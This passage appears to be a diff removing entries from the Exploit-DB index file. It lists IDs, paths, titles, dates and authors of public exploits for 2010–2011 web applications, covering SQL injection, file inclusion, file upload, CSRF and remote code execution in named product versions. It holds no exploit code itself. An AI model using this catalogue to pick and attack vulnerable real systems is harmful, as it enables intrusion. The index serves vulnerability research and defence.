-15687,exploits/asp/webapps/15687.txt,"Ecommercemax Solutions Digital Goods Seller - SQL Injection",2010-12-05,R4dc0re,asp,webapps, -15688,exploits/asp/webapps/15688.txt,"HotWebScripts HotWeb Rentals - 'resorts.asp' SQL Injection",2010-12-05,R4dc0re,asp,webapps, -15690,exploits/asp/webapps/15690.txt,"SOOP Portal 2.0 - Arbitrary File Upload",2010-12-05,Net.Edit0r,asp,webapps, -15691,exploits/php/webapps/15691.txt,"Pulse CMS Basic - Local File Inclusion",2010-12-05,"Mark Stanislav",php,webapps, -15699,exploits/php/webapps/15699.txt,"phpMyAdmin - Client-Side Code Injection / Redirect Link Falsification",2010-12-06,"emgent white_sheep & scox",php,webapps,80 -33671,exploits/php/webapps/33671.txt,"MySmartBB 1.7 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-24,indoushka,php,webapps, -15701,exploits/php/webapps/15701.txt,"MODx REvolution CMS 2.0.4-pl2 - POST injection Cross-Site Scripting",2010-12-06,LiquidWorm,php,webapps, -15703,exploits/asp/webapps/15703.txt,"SOOP Portal Raven 1.0b - Arbitrary File Upload",2010-12-07,"Sun Army",asp,webapps, -15744,exploits/cgi/webapps/15744.txt,"Gitweb 1.7.3.3 - Cross-Site Scripting",2010-12-15,emgent,cgi,webapps,80 -15710,exploits/multiple/webapps/15710.txt,"Apache Archiva 1.0 < 1.3.1 - Cross-Site Request Forgery",2010-12-09,"Anatolia Security",multiple,webapps, -15711,exploits/php/webapps/15711.pl,"Abtp Portal Project 0.1.0 - Local File Inclusion",2010-12-09,Br0ly,php,webapps, -15714,exploits/php/webapps/15714.txt,"Joomla! Component JE Auto 1.0 - SQL Injection",2010-12-09,"Salvatore Fresta",php,webapps, -15715,exploits/php/webapps/15715.txt,"CMScout 2.09 - Cross-Site Request Forgery",2010-12-09,"High-Tech Bridge SA",php,webapps, -15720,exploits/php/webapps/15720.txt,"Sulata iSoft - 'stream.php' Local File Disclosure",2010-12-10,Sudden_death,php,webapps, -15718,exploits/php/webapps/15718.txt,"AJ Matrix DNA - SQL Injection",2010-12-09,Br0ly,php,webapps, -15719,exploits/php/webapps/15719.txt,"Joomla! Component JE Messenger 1.0 - Arbitrary File Upload",2010-12-09,"Salvatore Fresta",php,webapps, -15721,exploits/php/webapps/15721.txt,"Joomla! Component com_billyportfolio 1.1.2 - Blind SQL Injection",2010-12-10,jdc,php,webapps, -15728,exploits/hardware/webapps/15728.txt,"Clear iSpot/Clearspot 2.0.0.0 - Cross-Site Request Forgery",2010-12-12,"Trustwave's SpiderLabs",hardware,webapps, -15735,exploits/php/webapps/15735.txt,"MantisBT 1.2.3 (db_type) - Cross-Site Scripting / Full Path Disclosure",2010-12-15,LiquidWorm,php,webapps, -15736,exploits/php/webapps/15736.txt,"MantisBT 1.2.3 (db_type) - Local File Inclusion",2010-12-15,LiquidWorm,php,webapps, -15737,exploits/cgi/webapps/15737.txt,"Google Urchin 5.7.03 - Local File Inclusion",2010-12-15,"Kristian Erik Hermansen",cgi,webapps, -15740,exploits/php/webapps/15740.txt,"Pointter PHP Content Management System - Unauthorized Privilege Escalation",2010-12-15,"Mark Stanislav",php,webapps, -15741,exploits/php/webapps/15741.txt,"Pointter PHP Micro-Blogging Social Network - Unauthorized Privilege Escalation",2010-12-15,"Mark Stanislav",php,webapps, -15742,exploits/php/webapps/15742.txt,"BEdita 3.0.1.2550 - Multiple Vulnerabilities",2010-12-15,"High-Tech Bridge SA",php,webapps, -15743,exploits/php/webapps/15743.txt,"Blog:CMS 4.2.1e - Multiple Vulnerabilities",2010-12-15,"High-Tech Bridge SA",php,webapps, -15748,exploits/php/webapps/15748.txt,"QualDev eCommerce script - SQL Injection",2010-12-16,ErrNick,php,webapps, -15749,exploits/php/webapps/15749.txt,"Joomla! Component JRadio - Local File Inclusion",2010-12-16,Sid3^effects,php,webapps, -15752,exploits/php/webapps/15752.txt,"Softbiz PHP Joke Site Software - Multiple SQL Injections",2010-12-17,v3n0m,php,webapps, -15753,exploits/hardware/webapps/15753.html,"D-Link DIR-300 - Cross-Site Request Forgery (Change Admin Account Settings)",2010-12-17,outlaw.dll,hardware,webapps, -15754,exploits/php/webapps/15754.txt,"Immo Makler Script - SQL Injection",2010-12-17,"Easy Laster",php,webapps, -15755,exploits/php/webapps/15755.txt,"Easy Online Shop - SQL Injection",2010-12-17,"Easy Laster",php,webapps, -15756,exploits/php/webapps/15756.txt,"MHP Downloadshop - SQL Injection",2010-12-17,"Easy Laster",php,webapps, -15766,exploits/php/webapps/15766.txt,"Radius Manager 3.8.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-17,"Rodrigo Rubira Branco",php,webapps, -15765,exploits/php/webapps/15765.txt,"CubeCart 3.x - Arbitrary File Upload",2010-12-17,StunTMaN!,php,webapps, -15768,exploits/php/webapps/15768.txt,"MCFileManager Plugin for TinyMCE 3.2.2.3 - Arbitrary File Upload",2010-12-18,"Vladimir Vorontsov",php,webapps, -15769,exploits/php/webapps/15769.txt,"Ero Auktion 2010 - 'item.php' SQL Injection",2010-12-18,"DeadLy DeMon",php,webapps, -15770,exploits/php/webapps/15770.txt,"Download Center 2.2 - SQL Injection",2010-12-18,"DeadLy DeMon",php,webapps, -15771,exploits/php/webapps/15771.txt,"SchuldnerBeratung - SQL Injection",2010-12-18,"DeadLy DeMon",php,webapps, -15772,exploits/php/webapps/15772.txt,"PayPal Shop Digital - SQL Injection",2010-12-18,"DeadLy DeMon",php,webapps, -15773,exploits/php/webapps/15773.txt,"Projekt Shop - 'details.php' Multiple SQL Injections",2010-12-18,"DeadLy DeMon",php,webapps, -15775,exploits/php/webapps/15775.txt,"Mafia Game Script - SQL Injection",2010-12-18,"DeadLy DeMon",php,webapps, -15776,exploits/asp/webapps/15776.pl,"Virtual Store Open 3.0 - Acess SQL Injection",2010-12-18,Br0ly,asp,webapps, -15777,exploits/asp/webapps/15777.txt,"Oto Galery 1.0 - Multiple SQL Injections",2010-12-19,"DeadLy DeMon",asp,webapps, -15779,exploits/php/webapps/15779.txt,"Joomla! Component JE Auto - Local File Inclusion",2010-12-19,Sid3^effects,php,webapps, -15781,exploits/php/webapps/15781.txt,"Inout Webmail Script - Persistent Cross-Site Scripting",2010-12-20,Sid3^effects,php,webapps, -15783,exploits/php/webapps/15783.txt,"PHP-Nuke MaticMarket 2.02 - Local File Inclusion",2010-12-20,xer0x,php,webapps, -15784,exploits/asp/webapps/15784.txt,"Elcom CommunityManager.NET - Authentication Bypass",2010-12-20,"Sense of Security",asp,webapps, -15789,exploits/php/webapps/15789.txt,"plx Ad Trader 3.2 - Authentication Bypass",2010-12-20,R4dc0re,php,webapps, -15790,exploits/php/webapps/15790.txt,"PHP Web Scripts Ad Manager Pro 3.0 - SQL Injection",2010-12-20,R4dc0re,php,webapps, -15791,exploits/php/webapps/15791.txt,"Joomla! Component JotLoader 2.2.1 - Local File Inclusion",2010-12-20,v3n0m,php,webapps, -15793,exploits/php/webapps/15793.txt,"Vacation Rental Script 4.0 - Arbitrary File Upload",2010-12-20,Br0ly,php,webapps, -15795,exploits/php/webapps/15795.txt,"S9Y Serendipity 1.5.4 - Arbitrary File Upload",2010-12-21,pentesters.ir,php,webapps, -15797,exploits/php/webapps/15797.txt,"Hycus CMS - Multiple Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps, -15798,exploits/php/webapps/15798.txt,"Injader CMS - Multiple Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps, -15799,exploits/php/webapps/15799.txt,"Habari Blog - Multiple Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps, -15800,exploits/php/webapps/15800.txt,"html-edit CMS - Multiple Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps, -15801,exploits/php/webapps/15801.txt,"Joomla! Component com_xgallery 1.0 - Local File Inclusion",2010-12-21,KelvinX,php,webapps, -15804,exploits/php/webapps/15804.txt,"jobappr 1.4 - Multiple Vulnerabilities",2010-12-21,giudinvx,php,webapps, -15807,exploits/cgi/webapps/15807.txt,"Mitel AWC - Unauthenticated Command Execution",2010-12-22,Procheckup,cgi,webapps, -15808,exploits/php/webapps/15808.txt,"WordPress Plugin Accept Signups 0.1 - Cross-Site Scripting",2010-12-22,clshack,php,webapps, -15810,exploits/hardware/webapps/15810.txt,"D-Link WBR-1310 - Authentication Bypass",2010-12-23,"Craig Heffner",hardware,webapps, -15811,exploits/php/webapps/15811.txt,"Built2Go PHP Shopping - SQL Injection",2010-12-23,Br0ly,php,webapps, -15812,exploits/php/webapps/15812.txt,"Ypninc Realty Classifieds - SQL Injection",2010-12-23,Br0ly,php,webapps, -15813,exploits/php/webapps/15813.txt,"IPN Development Handler 2.0 - Multiple Vulnerabilities",2010-12-23,AtT4CKxT3rR0r1ST,php,webapps, -15814,exploits/php/webapps/15814.txt,"Joomla! Component com_ponygallery - Remote File Inclusion",2010-12-23,AtT4CKxT3rR0r1ST,php,webapps, -15815,exploits/php/webapps/15815.txt,"Joomla! Component com_adsmanager - Remote File Inclusion",2010-12-23,AtT4CKxT3rR0r1ST,php,webapps, -15816,exploits/php/webapps/15816.txt,"CubeCart 3.0.4 - SQL Injection",2010-12-23,Dr.NeT,php,webapps, -15818,exploits/php/webapps/15818.txt,"iDevSpot iDevCart 1.10 - Multiple Local File Inclusions",2010-12-24,v3n0m,php,webapps, -15819,exploits/php/webapps/15819.txt,"Joomla! Component com_xmovie 1.0 - Local File Inclusion",2010-12-24,KelvinX,php,webapps, -15820,exploits/php/webapps/15820.txt,"SquareCMS 0.3.1 - 'post.php' SQL Injection",2010-12-24,cOndemned,php,webapps, -15822,exploits/php/webapps/15822.html,"CubeCart 3.0.6 - Cross-Site Request Forgery (Add Admin)",2010-12-24,"P0C T34M",php,webapps, -15824,exploits/php/webapps/15824.txt,"Pligg CMS 1.1.2 - Blind SQL Injection / Cross-Site Scripting",2010-12-25,"Michael Brooks",php,webapps, -15825,exploits/php/webapps/15825.txt,"openauto 1.6.3 - Multiple Vulnerabilities",2010-12-25,"Michael Brooks",php,webapps, -15826,exploits/php/webapps/15826.txt,"Traidnt Up 3.0 - Cross-Site Request Forgery",2010-12-25,"P0C T34M",php,webapps, -15827,exploits/php/webapps/15827.txt,"Joomla! Component com_idoblog - SQL Injection",2010-12-25,NOCKAR1111,php,webapps, -15828,exploits/php/webapps/15828.txt,"Vacation Rental Script 4.0 - Cross-Site Request Forgery",2010-12-25,OnurTURKESHAN,php,webapps, -15838,exploits/php/webapps/15838.php,"OpenClassifieds 1.7.0.3 - Chained: Captcha Bypass / SQL Injection / Persistent Cross-Site Scripting on FrontPage",2010-12-28,"Michael Brooks",php,webapps, -15830,exploits/php/webapps/15830.txt,"Social Engine 4.x (Music Plugin) - Arbitrary File Upload",2010-12-25,MyDoom,php,webapps, -15831,exploits/php/webapps/15831.txt,"LoveCMS 1.6.2 Final - Multiple Local File Inclusions",2010-12-25,cOndemned,php,webapps, -15832,exploits/php/webapps/15832.txt,"Interact 2.4.1 - SQL Injection",2010-12-26,"IR Security",php,webapps, -15835,exploits/php/webapps/15835.html,"pecio CMS 2.0.5 - Cross-Site Request Forgery (Add Admin)",2010-12-27,"P0C T34M",php,webapps, -15836,exploits/php/webapps/15836.txt,"OpenEMR 3.2.0 - SQL Injection / Cross-Site Scripting",2010-12-27,blake,php,webapps, -15837,exploits/php/webapps/15837.txt,"Web@all 1.1 - Remote Admin Settings Change",2010-12-27,"Giuseppe D'Inverno",php,webapps, -15840,exploits/php/webapps/15840.txt,"ardeaCore 2.25 - PHP Framework Remote File Inclusion",2010-12-29,n0n0x,php,webapps, -15843,exploits/php/webapps/15843.txt,"News Script PHP Pro - 'FCKeditor' Arbitrary File Upload",2010-12-29,Net.Edit0r,php,webapps, -15846,exploits/php/webapps/15846.txt,"kaibb 1.0.1 - Multiple Vulnerabilities",2010-12-29,"High-Tech Bridge SA",php,webapps, -15847,exploits/php/webapps/15847.txt,"DzTube - SQL Injection",2010-12-29,"errnick qwe",php,webapps, -15848,exploits/php/webapps/15848.txt,"PHP-AddressBook 6.2.4 - 'group.php' SQL Injection",2010-12-29,hiphop,php,webapps, -15849,exploits/php/webapps/15849.txt,"LoveCMS 1.6.2 - Cross-Site Request Forgery / Code Injection",2010-12-29,hiphop,php,webapps, -15850,exploits/php/webapps/15850.html,"PiXie CMS 1.04 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-12-29,"Ali Raheem",php,webapps, -15852,exploits/php/webapps/15852.txt,"Siteframe CMS 3.2.3 - 'user.php' SQL Injection",2010-12-29,"AnGrY BoY",php,webapps, -15853,exploits/php/webapps/15853.txt,"DGNews 2.1 - SQL Injection",2010-12-29,kalashnikov,php,webapps, -15856,exploits/php/webapps/15856.php,"TYPO3 - Unauthenticated Arbitrary File Retrieval",2010-12-29,ikki,php,webapps, -15857,exploits/php/webapps/15857.txt,"Discovery TorrentTrader 2.6 - Multiple Vulnerabilities",2010-12-29,EsS4ndre,php,webapps, -15858,exploits/php/webapps/15858.txt,"WordPress 3.0.3 - Persistent Cross-Site Scripting (Internet Explorer 6/7 / NS8.1)",2010-12-29,Saif,php,webapps, -15863,exploits/php/webapps/15863.txt,"LightNEasy 3.2.2 - Multiple Vulnerabilities",2010-12-29,"High-Tech Bridge SA",php,webapps, -15864,exploits/php/webapps/15864.txt,"Ignition 1.3 - 'page.php' Local File Inclusion",2010-12-30,cOndemned,php,webapps, -15865,exploits/php/webapps/15865.php,"Ignition 1.3 - Remote Code Execution",2010-12-30,cOndemned,php,webapps, -15915,exploits/php/webapps/15915.py,"Concrete CMS 5.4.1.1 - Cross-Site Scripting / Remote Code Execution",2011-01-05,mr_me,php,webapps, -15886,exploits/php/webapps/15886.txt,"KLINK - SQL Injection",2011-01-01,"Mauro Rossi & Andres Gomez",php,webapps, -15887,exploits/php/webapps/15887.txt,"ChurchInfo 1.2.12 - SQL Injection",2011-01-01,dun,php,webapps, -15889,exploits/php/webapps/15889.txt,"Sahana Agasti 0.6.4 - SQL Injection",2011-01-01,dun,php,webapps, -15890,exploits/php/webapps/15890.txt,"Tech Shop Technote 7 - SQL Injection",2011-01-01,MaJ3stY,php,webapps, -15891,exploits/php/webapps/15891.txt,"GALLARIFIC PHP Photo Gallery Script - 'gallery.php' SQL Injection",2011-01-02,AtT4CKxT3rR0r1ST,php,webapps, -15892,exploits/php/webapps/15892.html,"YourTube 1.0 - Cross-Site Request Forgery (Add User)",2011-01-02,AtT4CKxT3rR0r1ST,php,webapps, -15893,exploits/php/webapps/15893.py,"amoeba CMS 1.01 - Multiple Vulnerabilities",2011-01-02,mr_me,php,webapps, -15896,exploits/php/webapps/15896.txt,"Sahana Agasti 0.6.4 - Multiple Remote File Inclusions",2011-01-03,n0n0x,php,webapps, -15902,exploits/php/webapps/15902.html,"S40 CMS 0.4.1 - Cross-Site Request Forgery (Change Admin Password)",2011-01-04,pentesters.ir,php,webapps, -15907,exploits/php/webapps/15907.txt,"Nucleus 3.61 - Multiple Remote File Inclusions",2011-01-05,n0n0x,php,webapps, -15913,exploits/php/webapps/15913.pl,"PhpGedView 4.2.3 - Local File Inclusion",2011-01-05,dun,php,webapps, -15961,exploits/php/webapps/15961.txt,"TinyBB 1.2 - SQL Injection",2011-01-10,Aodrulez,php,webapps, -15918,exploits/jsp/webapps/15918.txt,"Openfire 3.6.4 - Multiple Cross-Site Request Forgery Vulnerabilities",2011-01-06,"Riyaz Ahemed Walikar",jsp,webapps, -15920,exploits/php/webapps/15920.txt,"F3Site 2011 alfa 1 - Cross-Site Scripting / Cross-Site Request Forgery",2011-01-06,"High-Tech Bridge SA",php,webapps, -15921,exploits/php/webapps/15921.txt,"phpMySport 1.4 - SQL Injection / Authentication Bypass / Full Path Disclosure",2011-01-06,"High-Tech Bridge SA",php,webapps, -15922,exploits/php/webapps/15922.txt,"Phenotype CMS 3.0 - SQL Injection",2011-01-06,"High-Tech Bridge SA",php,webapps, -15923,exploits/php/webapps/15923.txt,"PHP MicroCMS 1.0.1 - Cross-Site Request Forgery / Cross-Site Scripting",2011-01-06,"High-Tech Bridge SA",php,webapps, -15924,exploits/php/webapps/15924.txt,"openSite 0.2.2 Beta - Local File Inclusion",2011-01-07,n0n0x,php,webapps, -15938,exploits/php/webapps/15938.txt,"axdcms-0.1.1 - Local File Inclusion",2011-01-08,n0n0x,php,webapps, -15939,exploits/php/webapps/15939.txt,"Elxis CMS 2009.2 - Remote File Inclusion",2011-01-08,n0n0x,php,webapps, -15942,exploits/php/webapps/15942.txt,"sahana agasti 0.6.5 - Multiple Vulnerabilities",2011-01-08,dun,php,webapps, -15943,exploits/php/webapps/15943.txt,"WordPress Plugin mingle forum 1.0.26 - Multiple Vulnerabilities",2011-01-08,"Charles Hooper",php,webapps, -15945,exploits/php/webapps/15945.txt,"Zwii 2.1.1 - Remote File Inclusion",2011-01-08,"Abdi Mohamed",php,webapps, -15958,exploits/php/webapps/15958.txt,"Joomla! Plugin Captcha 4.5.1 - Local File Disclosure",2011-01-09,dun,php,webapps, -15960,exploits/php/webapps/15960.txt,"Maximus CMS 1.1.2 - 'FCKeditor' Arbitrary File Upload",2011-01-10,eidelweiss,php,webapps, -15964,exploits/php/webapps/15964.py,"Lotus CMS Fraise 3.0 - Local File Inclusion / Remote Code Execution",2011-01-10,mr_me,php,webapps, -15968,exploits/php/webapps/15968.txt,"vam shop 1.6 - Multiple Vulnerabilities",2011-01-11,"High-Tech Bridge SA",php,webapps, -15969,exploits/php/webapps/15969.txt,"diafan.cms 4.3 - Multiple Vulnerabilities",2011-01-11,"High-Tech Bridge SA",php,webapps, -15970,exploits/php/webapps/15970.txt,"Cambio 0.5a - Cross-Site Request Forgery",2011-01-11,"High-Tech Bridge SA",php,webapps, -15966,exploits/php/webapps/15966.txt,"Extcalendar 2 - 'calendar.php' SQL Injection",2011-01-11,"Lagripe-Dz & Mca-Crb",php,webapps, -15967,exploits/php/webapps/15967.txt,"energine 2.3.8 - Multiple Vulnerabilities",2011-01-11,"High-Tech Bridge SA",php,webapps, -15971,exploits/php/webapps/15971.txt,"whCMS 0.115 - Cross-Site Request Forgery",2011-01-11,"High-Tech Bridge SA",php,webapps, -15981,exploits/php/webapps/15981.txt,"LifeType 1.2.10 - HTTP Referer Persistent Cross-Site Scripting",2011-01-12,"Saif El-Sherei",php,webapps, -15979,exploits/php/webapps/15979.txt,"Joomla! 1.5.22 / 1.6.0 - 'com_mailto' Spam Mail Relay",2011-01-12,"Jeff Channell",php,webapps, -15987,exploits/cgi/webapps/15987.py,"SiteScape Enterprise Forum 7 - TCL Injection",2011-01-13,"Spencer McIntyre",cgi,webapps, -16020,exploits/php/webapps/16020.txt,"PHP Lowbids - 'viewfaqs.php' Blind SQL Injection",2011-01-20,"BorN To K!LL",php,webapps, -15989,exploits/php/webapps/15989.txt,"Joomla! Component People 1.0.0 - SQL Injection",2011-01-14,"Salvatore Fresta",php,webapps, -15993,exploits/php/webapps/15993.html,"ViArt Shop 4.0.5 - Cross-Site Request Forgery",2011-01-15,Or4nG.M4N,php,webapps, -15995,exploits/php/webapps/15995.txt,"glfusion CMS 1.2.1 - 'img' Persistent Cross-Site Scripting",2011-01-15,Saif,php,webapps, -15996,exploits/php/webapps/15996.txt,"CompactCMS 1.4.1 - Multiple Vulnerabilities",2011-01-15,"Patrick de Brouwer",php,webapps, -15997,exploits/jsp/webapps/15997.py,"MeshCMS 3.5 - Remote Code Execution",2011-01-16,mr_me,jsp,webapps, -15999,exploits/php/webapps/15999.txt,"BetMore Site Suite 4 - 'bid' Blind SQL Injection",2011-01-16,"BorN To K!LL",php,webapps, -16000,exploits/php/webapps/16000.txt,"Seo Panel 2.2.0 - Cookie-Rendered Persistent Cross-Site Scripting",2011-01-16,"Mark Stanislav",php,webapps, -16001,exploits/php/webapps/16001.txt,"Joomla! Component com_people 1.0.0 - Local File Inclusion",2011-01-16,ALTBTA,php,webapps, -16003,exploits/php/webapps/16003.txt,"AWBS 2.9.2 - 'cart.php' Blind SQL Injection",2011-01-16,ShivX,php,webapps, -16004,exploits/php/webapps/16004.txt,"PHP-Fusion Teams Structure Infusion Addon - SQL Injection",2011-01-17,Saif,php,webapps, -16006,exploits/cgi/webapps/16006.html,"SmoothWall Express 3.0 - Multiple Vulnerabilities",2011-01-17,"dave b",cgi,webapps, -16010,exploits/php/webapps/16010.txt,"Joomla! Component allCineVid 1.0.0 - Blind SQL Injection",2011-01-18,"Salvatore Fresta",php,webapps, -16011,exploits/php/webapps/16011.txt,"CakePHP 1.3.5/1.2.8 - 'Unserialize()' File Inclusion",2011-01-18,felix,php,webapps, -16013,exploits/php/webapps/16013.html,"N-13 News 3.4 - Cross-Site Request Forgery (Admin Add)",2011-01-18,anT!-Tr0J4n,php,webapps, -17209,exploits/php/webapps/17209.txt,"SoftMP3 - SQL Injection",2011-04-24,mArTi,php,webapps, -16016,exploits/php/webapps/16016.txt,"Simploo CMS 1.7.1 - PHP Code Execution",2011-01-19,"David Vieira-Kurz",php,webapps, -16039,exploits/php/webapps/16039.txt,"Joomla! Component com_b2portfolio 1.0.0 - Multiple SQL Injections",2011-01-24,"Salvatore Fresta",php,webapps, -16018,exploits/php/webapps/16018.txt,"PHP auctions - 'viewfaqs.php' Blind SQL Injection",2011-01-19,"BorN To K!LL",php,webapps, -16019,exploits/php/webapps/16019.txt,"phpCMS 2008 - SQL Injection",2011-01-20,R3d-D3V!L,php,webapps, -16027,exploits/php/webapps/16027.txt,"phpCMS 9.0 - Blind SQL Injection",2011-01-22,eidelweiss,php,webapps, -16028,exploits/php/webapps/16028.txt,"cultbooking 2.0.4 - Multiple Vulnerabilities",2011-01-22,LiquidWorm,php,webapps, -16034,exploits/php/webapps/16034.txt,"PHP Coupon Script 6.0 - 'bus' Blind SQL Injection",2011-01-23,"BorN To K!LL",php,webapps, -16037,exploits/php/webapps/16037.html,"PHP Link Directory 4.1.0 - Cross-Site Request Forgery (Add Admin)",2011-01-23,AtT4CKxT3rR0r1ST,php,webapps, -16060,exploits/php/webapps/16060.txt,"comercioplus 5.6 - Multiple Vulnerabilities",2011-01-27,"Daniel Godoy",php,webapps, -16044,exploits/php/webapps/16044.txt,"ab Web CMS 1.35 - Multiple Vulnerabilities",2011-01-25,"Dr.0rYX & Cr3W-DZ",php,webapps, -16047,exploits/php/webapps/16047.txt,"PHPDirector Game Edition - 'game.php' SQL Injection",2011-01-26,AtT4CKxT3rR0r1ST,php,webapps, -16110,exploits/php/webapps/16110.txt,"reos 2.0.5 - Multiple Vulnerabilities",2011-02-04,"High-Tech Bridge SA",php,webapps, -16049,exploits/php/webapps/16049.txt,"AWCM 2.2 Final - Local File Inclusion",2011-01-26,Cucura,php,webapps, -16050,exploits/php/webapps/16050.txt,"class.upload.php 0.30 - Arbitrary File Upload",2011-01-26,DIES3L,php,webapps, -16051,exploits/php/webapps/16051.txt,"Froxlor 0.9.15 - Remote File Inclusion",2011-01-26,DIES3L,php,webapps, -16054,exploits/windows/webapps/16054.txt,"sap crystal report server 2008 - Directory Traversal",2011-01-26,"Dmitriy Chastuhin",windows,webapps, -16058,exploits/php/webapps/16058.txt,"MultiPowUpload 2.1 - Arbitrary File Upload",2011-01-26,DIES3L,php,webapps, -16059,exploits/php/webapps/16059.txt,"Xnova Legacies 2009.2 - Cross-Site Request Forgery",2011-01-26,"Xploit A Day",php,webapps, -16061,exploits/php/webapps/16061.txt,"PHP Link Directory Software - 'sbcat_id' SQL Injection",2011-01-28,"BorN To K!LL",php,webapps, -16062,exploits/php/webapps/16062.txt,"PHP Classified ads software - 'cid' Blind SQL Injection",2011-01-28,"BorN To K!LL",php,webapps, -16069,exploits/php/webapps/16069.txt,"PHP Script Directory Software - 'sbcat_id' SQL Injection",2011-01-28,"BorN To K!LL",php,webapps, -16074,exploits/php/webapps/16074.txt,"MultiCMS - Local File Inclusion",2011-01-29,R3VAN_BASTARD,php,webapps, -16076,exploits/php/webapps/16076.txt,"vBSEO 3.2.2/3.5.2 - Persistent Cross-Site Scripting via LinkBacks",2011-01-30,MaXe,php,webapps, -16077,exploits/php/webapps/16077.txt,"vBSEO Sitemap 2.5/3.0 - Multiple Vulnerabilities",2011-01-30,MaXe,php,webapps, -16080,exploits/php/webapps/16080.txt,"RW-Download 4.0.6 - 'index.php' SQL Injection",2011-01-30,Dr.NeT,php,webapps, -16272,exploits/php/webapps/16272.txt,"Limelight Software - 'article.php' SQL Injection",2011-03-04,eXeSoul,php,webapps, -16088,exploits/php/webapps/16088.php,"NetLink - Arbitrary File Upload",2011-02-01,lumut--,php,webapps, -16090,exploits/php/webapps/16090.txt,"TinyWebGallery 1.8.3 - Multiple Vulnerabilities",2011-02-01,"Yam Mesicka",php,webapps, -16091,exploits/php/webapps/16091.txt,"Joomla! 1.5/1.6 - JFilterInput Cross-Site Scripting Bypass",2011-02-01,"Jeff Channell",php,webapps, -16094,exploits/php/webapps/16094.txt,"Raja Natarajan Guestbook 1.0 - Local File Inclusion",2011-02-02,h0rd,php,webapps, -16096,exploits/php/webapps/16096.txt,"RedaxScript 0.3.2 - Multiple Vulnerabilities",2011-02-02,"High-Tech Bridge SA",php,webapps, -16097,exploits/php/webapps/16097.txt,"Zikula CMS 1.2.4 - Cross-Site Request Forgery",2011-02-02,"Aung Khant",php,webapps, -16102,exploits/php/webapps/16102.txt,"Islam Sound IV2 - 'details.php' SQL Injection",2011-02-03,ZxH-Labs,php,webapps, -16106,exploits/php/webapps/16106.txt,"OemPro 3.6.4 - Multiple Vulnerabilities",2011-02-03,"Ignacio Garrido",php,webapps, -16109,exploits/php/webapps/16109.txt,"Podcast Generator 1.3 - Multiple Vulnerabilities",2011-02-04,"High-Tech Bridge SA",php,webapps, -16113,exploits/php/webapps/16113.txt,"osCommerce - Authentication Bypass",2011-02-04,"Nicolas Krassas",php,webapps, -16114,exploits/php/webapps/16114.txt,"Chamilo 1.8.7 / Dokeos 1.8.6 - Remote File Disclosure",2011-02-05,beford,php,webapps, -16116,exploits/php/webapps/16116.txt,"Qcodo Development Framework 0.3.3 - Full Information Disclosure",2011-02-05,"Daniel Godoy",php,webapps, -16117,exploits/php/webapps/16117.txt,"Escort und Begleitservice Agentur Script - SQL Injection",2011-02-05,NoNameMT,php,webapps, -16122,exploits/php/webapps/16122.txt,"Dew-NewPHPLinks 2.1b - 'index.php' SQL Injection",2011-02-06,AtT4CKxT3rR0r1ST,php,webapps, -16221,exploits/php/webapps/16221.txt,"WordPress Plugin Comment Rating 2.9.23 - Multiple Vulnerabilities",2011-02-23,"High-Tech Bridge SA",php,webapps, -16127,exploits/php/webapps/16127.txt,"T-Content Managment System - Multiple Vulnerabilities",2011-02-07,"Daniel Godoy",php,webapps, -16128,exploits/php/webapps/16128.txt,"jakcms 2.0 pro rc5 - Persistent Cross-Site Scripting via useragent http header Injection",2011-02-07,"Saif El-Sherei",php,webapps, -16130,exploits/php/webapps/16130.txt,"MyMarket 1.71 - 'index.php' SQL Injection",2011-02-07,ahmadso,php,webapps, -16131,exploits/php/webapps/16131.txt,"SWFupload 2.5.0 Beta 3 - Arbitrary File Upload",2011-02-07,"Daniel Godoy",php,webapps, -16134,exploits/php/webapps/16134.txt,"Model Agentur Script - SQL Injection",2011-02-08,NoNameMT,php,webapps, -16135,exploits/php/webapps/16135.html,"dotProject 2.1.5 - Cross-Site Request Forgery",2011-02-08,"AutoSec Tools",php,webapps, -16136,exploits/php/webapps/16136.html,"AIOCP 1.4.001 - Cross-Site Request Forgery",2011-02-08,"AutoSec Tools",php,webapps, -16139,exploits/php/webapps/16139.txt,"Auto Database System 1.0 Infusion Addon - SQL Injection",2011-02-09,Saif,php,webapps, -16140,exploits/php/webapps/16140.txt,"Web 2.0 Social Network Freunde Community - SQL Injection",2011-02-09,NoNameMT,php,webapps, -16167,exploits/php/webapps/16167.txt,"jSchool Advanced - SQL Injection",2011-02-14,eXa.DisC,php,webapps, -16168,exploits/php/webapps/16168.txt,"RunCMS 2.2.2 - Multiple Vulnerabilities",2011-02-14,"High-Tech Bridge SA",php,webapps, -16143,exploits/php/webapps/16143.txt,"MihanTools Script 1.3.3 - SQL Injection",2011-02-09,WHITE_DEVIL,php,webapps, -16144,exploits/php/webapps/16144.txt,"WordPress Plugin Enable Media Replace - Multiple Vulnerabilities",2011-02-09,"Ulf Harnhammar",php,webapps, -16183,exploits/php/webapps/16183.txt,"GAzie 5.10 - 'Login' Multiple Vulnerabilities",2011-02-17,LiquidWorm,php,webapps, -16165,exploits/php/webapps/16165.txt,"AWCM 2.2 Final - Persistent Cross-Site Scripting",2011-02-14,_84kur10_,php,webapps, -16148,exploits/php/webapps/16148.txt,"SourceBans 1.4.7 - Cross-Site Scripting",2011-02-09,Sw1tCh,php,webapps, -16152,exploits/multiple/webapps/16152.py,"LocatePC 1.05 (Ligatt Version + Others) - SQL Injection",2011-02-10,anonymous,multiple,webapps, -16154,exploits/php/webapps/16154.txt,"Horde - Horde_Image::factory driver Argument Local File Inclusion",2011-02-11,skysbsb,php,webapps, -16155,exploits/php/webapps/16155.txt,"Geomi CMS 1.2/3.0 - SQL Injection",2011-02-11,"ThunDEr HeaD",php,webapps, -16156,exploits/php/webapps/16156.txt,"Kunena < 1.5.13 / < 1.6.3 - SQL Injection",2011-02-11,"Red Matter",php,webapps, -16157,exploits/jsp/webapps/16157.py,"Openedit 5.1294 - Remote Code Execution",2011-02-11,mr_me,jsp,webapps, -16158,exploits/php/webapps/16158.txt,"TaskFreak! 0.6.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-12,LiquidWorm,php,webapps, -16159,exploits/php/webapps/16159.txt,"Escort Agency CMS - Blind SQL Injection",2011-02-12,NoNameMT,php,webapps, -16160,exploits/php/webapps/16160.txt,"PixelPost 